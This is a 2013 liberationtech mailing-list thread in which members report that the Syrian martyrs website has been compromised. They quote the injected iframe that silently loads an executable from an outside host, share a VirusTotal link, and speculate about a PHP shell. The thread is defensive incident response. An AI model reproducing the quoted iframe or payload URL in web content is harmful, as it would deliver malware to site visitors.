[liberationtech] Syrian-martyrs.com website probably compromised by virus
KheOps
kheops at ceops.eu
Tue Jan 29 14:40:36 PST 2013
Hey,
Le 29/01/2013 23:34, SiNA Rabbani a écrit :
> This is the malware:
>> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/
Yes, saw that too.
However, I don't find any precise description of its behaviour. Like,
what it does, if it opens any port, sends data to a C&C or whatever.
I have downloaded it there:
https://resources.telecomix.ceops.eu/material/malwares/
All the best,
>
>
> --SiNA
>
>
>
> SiNA
>
> Rabbani:
>> holly shit:
>
>> <iframe name="I1" width="10" height="10"
>> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
>
>
> border="0"
>> frameborder="0">
>
>
>> :/ if you are running windows don't even go there!!!
>
>
>> Andrew Lewis:
>>> I can get to this in 6 hours or so, maybe someone is willing to
>>> jump on this before then?
>
>>> -Andrew
>
>>> On Jan 30, 2013, at 11:06 AM, KheOps <kheops at ceops.eu> wrote:
>
>>>> Dear Libtech,
>>>>
>>>> We just saw that the website : http://www.syrian-martyrs.com
>>>> is probably compromised. Every page of the website contains an
>>>> iFrame which links to a .exe file which is detected as a virus
>>>> by antivirus software:
>>>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
>>>>
>>>>
>>>>
>
>>>>
> The fact that the HTML code is present at the bottom of each page makes
>>>> me think that the "index.php" page has been changed in a way
>>>> that makes that iFrame appear on every page of the website,
>>>> after the dynamic content.
>>>>
>>>> It also probably means that the attackers have some kind of
>>>> access to the server. My guess would be going to a PHP shell,
>>>> but I'm no expert in this.
>>>>
>>>> Any help, clue, investigation, would be very welcome :)
>>>>
>>>> Thank you, KheOps
>>>>
>>>> -- Unsubscribe, change to digest, or change password at:
>>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech
>>> -- Unsubscribe, change to digest, or change password at:
>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech
>
>
>
>
>
> --
> Unsubscribe, change to digest, or change password at: https://mailman.stanford.edu/mailman/listinfo/liberationtech
>
More information about the liberationtech
mailing list